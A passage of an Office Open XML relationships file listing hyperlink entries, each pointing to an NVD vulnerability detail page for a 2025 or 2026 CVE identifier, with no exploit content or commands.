Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69382" TargetMode="External" Id="rId4454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70091" TargetMode="External" Id="rId4455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70599" TargetMode="External" Id="rId4456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70605" TargetMode="External" Id="rId4457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70606" TargetMode="External" Id="rId4458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71310" TargetMode="External" Id="rId4459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72978" TargetMode="External" Id="rId4460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73068" TargetMode="External" Id="rId4461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75809" TargetMode="External" Id="rId4462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78123" TargetMode="External" Id="rId4463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78126" TargetMode="External" Id="rId4464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78129" TargetMode="External" Id="rId4465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78221" TargetMode="External" Id="rId4466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78483" TargetMode="External" Id="rId4467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78489" TargetMode="External" Id="rId4468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78620" TargetMode="External" Id="rId4469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79962" TargetMode="External" Id="rId4470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79968" TargetMode="External" Id="rId4471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79969" TargetMode="External" Id="rId4472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80051" TargetMode="External" Id="rId4473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80125" TargetMode="External" Id="rId4474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80341" TargetMode="External" Id="rId4475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80438" TargetMode="External" Id="rId4476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81347" TargetMode="External" Id="rId4477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81646" TargetMode="External" Id="rId4478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82215" TargetMode="External" Id="rId4479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82752" TargetMode="External" Id="rId4480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84185" TargetMode="External" Id="rId4481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84363" TargetMode="External" Id="rId4482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84373" TargetMode="External" Id="rId4483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84378" TargetMode="External" Id="rId4484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84890" TargetMode="External" Id="rId4485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84970" TargetMode="External" Id="rId4486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85014" TargetMode="External" Id="rId4487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85024" TargetMode="External" Id="rId4488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85534" TargetMode="External" Id="rId4489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86073" TargetMode="External" Id="rId4490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86074" TargetMode="External" Id="rId4491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86506" TargetMode="External" Id="rId4492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86735" TargetMode="External" Id="rId4493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86993" TargetMode="External" Id="rId4494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87123" TargetMode="External" Id="rId4495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87482" TargetMode="External" Id="rId4496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87590" TargetMode="External" Id="rId4497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87737" TargetMode="External" Id="rId4498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88763" TargetMode="External" Id="rId4499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9036" TargetMode="External" Id="rId4500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9744" TargetMode="External" Id="rId4501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0306" TargetMode="External" Id="rId4502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16005" TargetMode="External" Id="rId4503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19130" TargetMode="External" Id="rId4504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48071" TargetMode="External" Id="rId4505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50550" TargetMode="External" Id="rId4506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53796" TargetMode="External" Id="rId4507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63381" TargetMode="External" Id="rId4508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69129" TargetMode="External" Id="rId4509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69559" TargetMode="External" Id="rId4510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72764" TargetMode="External" Id="rId4511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73212" TargetMode="External" Id="rId4512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73213" TargetMode="External" Id="rId4513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73243" TargetMode="External" Id="rId4514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74866" TargetMode="External" Id="rId4515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75000" TargetMode="External" Id="rId4516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75006" TargetMode="External" Id="rId4517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75811" TargetMode="External" Id="rId4518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76925" TargetMode="External" Id="rId4519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84193" TargetMode="External" Id="rId4520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88061" TargetMode="External" Id="rId4521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15534" TargetMode="External" Id="rId4522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16006" TargetMode="External" Id="rId4523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16180" TargetMode="External" Id="rId4524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18023" TargetMode="External" Id="rId4525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53509" TargetMode="External" Id="rId4526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57825" TargetMode="External" Id="rId4527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63380" TargetMode="External" Id="rId4528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64676" TargetMode="External" Id="rId4529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67550" TargetMode="External" Id="rId4530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68874" TargetMode="External" Id="rId4531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69317" TargetMode="External" Id="rId4532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69349" TargetMode="External" Id="rId4533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69372" TargetMode="External" Id="rId4534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69393" TargetMode="External" Id="rId4535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69405" TargetMode="External" Id="rId4536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69416" TargetMode="External" Id="rId4537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69507" TargetMode="External" Id="rId4538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69552" TargetMode="External" Id="rId4539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69569" TargetMode="External" Id="rId4540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69572" TargetMode="External" Id="rId4541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69591" TargetMode="External" Id="rId4542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69637" TargetMode="External" Id="rId4543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69679" TargetMode="External" Id="rId4544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69723" TargetMode="External" Id="rId4545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70609" TargetMode="External" Id="rId4546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73308" TargetMode="External" Id="rId4547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75808" TargetMode="External" Id="rId4548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75810" TargetMode="External" Id="rId4549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77698" TargetMode="External" Id="rId4550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85788" TargetMode="External" Id="rId4551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88035" TargetMode="External" Id="rId4552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89157" TargetMode="External" Id="rId4553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0293" TargetMode="External" Id="rId4554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21093" TargetMode="External" Id="rId4555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53456" TargetMode="External" Id="rId4556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55663" TargetMode="External" Id="rId4557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66674" TargetMode="External" Id="rId4558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69832" TargetMode="External" Id="rId4559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73647" TargetMode="External" Id="rId4560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78043" TargetMode="External" Id="rId4561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78135" TargetMode="External" Id="rId4562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78629" TargetMode="External" Id="rId4563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79642" TargetMode="External" Id="rId4564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79730" TargetMode="External" Id="rId4565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79967" TargetMode="External" Id="rId4566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79970" TargetMode="External" Id="rId4567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81830" TargetMode="External" Id="rId4568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83557" TargetMode="External" Id="rId4569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84380" TargetMode="External" Id="rId4570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86144" TargetMode="External" Id="rId4571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88264" TargetMode="External" Id="rId4572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88265" TargetMode="External" Id="rId4573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-48651" TargetMode="External" Id="rId4574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51619" TargetMode="External" Id="rId4575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0636" TargetMode="External" Id="rId4576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16689" TargetMode="External" Id="rId4577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16730" TargetMode="External" Id="rId4578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17270" TargetMode="External" Id="rId4579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17440" TargetMode="External" Id="rId4580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17442" TargetMode="External" Id="rId4581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17469" TargetMode="External" Id="rId4582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18622" TargetMode="External" Id="rId4583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18858" TargetMode="External" Id="rId4584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19649" TargetMode="External" Id="rId4585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20500" TargetMode="External" Id="rId4586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20515" TargetMode="External" Id="rId4587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20516" TargetMode="External" Id="rId4588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24049" TargetMode="External" Id="rId4589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28584" TargetMode="External" Id="rId4590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28596" TargetMode="External" Id="rId4591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28617" TargetMode="External" Id="rId4592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28633" TargetMode="External" Id="rId4593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31911" TargetMode="External" Id="rId4594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31912" TargetMode="External" Id="rId4595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32591" TargetMode="External" Id="rId4596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39020" TargetMode="External" Id="rId4597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45376" TargetMode="External" Id="rId4598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48790" TargetMode="External" Id="rId4599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4897" TargetMode="External" Id="rId4600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49313" TargetMode="External" Id="rId4601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49831" TargetMode="External" Id="rId4602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49833" TargetMode="External" Id="rId4603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52772" TargetMode="External" Id="rId4604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52857" TargetMode="External" Id="rId4605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54422" TargetMode="External" Id="rId4606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54611" TargetMode="External" Id="rId4607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5704" TargetMode="External" Id="rId4608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59183" TargetMode="External" Id="rId4609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59983" TargetMode="External" Id="rId4610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59984" TargetMode="External" Id="rId4611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59985" TargetMode="External" Id="rId4612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61555" TargetMode="External" Id="rId4613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6244" TargetMode="External" Id="rId4614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63004" TargetMode="External" Id="rId4615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64369" TargetMode="External" Id="rId4616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64370" TargetMode="External" Id="rId4617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64371" TargetMode="External" Id="rId4618" /><Relationship 